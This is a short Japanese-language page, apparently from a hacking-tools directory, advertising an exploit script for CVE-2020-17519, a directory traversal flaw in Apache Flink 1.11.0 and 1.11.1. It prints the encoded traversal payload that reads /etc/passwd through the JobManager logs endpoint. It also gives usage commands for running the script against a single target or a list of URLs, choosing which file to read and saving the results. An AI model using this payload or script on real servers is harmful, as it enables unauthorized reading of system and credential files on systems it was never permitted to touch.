ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
Apache Flink 1.11.0 および 1.11.1 におけるディレクトリトラバーサル脆弱性のエクスプロイトスクリプト(CVE-2020-17519)
この脆弱性により、攻撃者は /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd のようなパスを介して、Apache Flink の JobManager で任意のファイルを読むことができます。
/jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
python3 CVE-2020-17519.py -u http://target.com
または、テキストファイルから複数のターゲットに対して実行します。
python3 CVE-2020-17519.py -f urls.txt
-u
http://target.com
-f
-p
/etc/passwd
-o
result.txt
python3 CVE-2020-17519.py -u http://target.com -p /etc/passwd
python3 CVE-2020-17519.py -f urls.txt -p /etc/passwd -o output.txt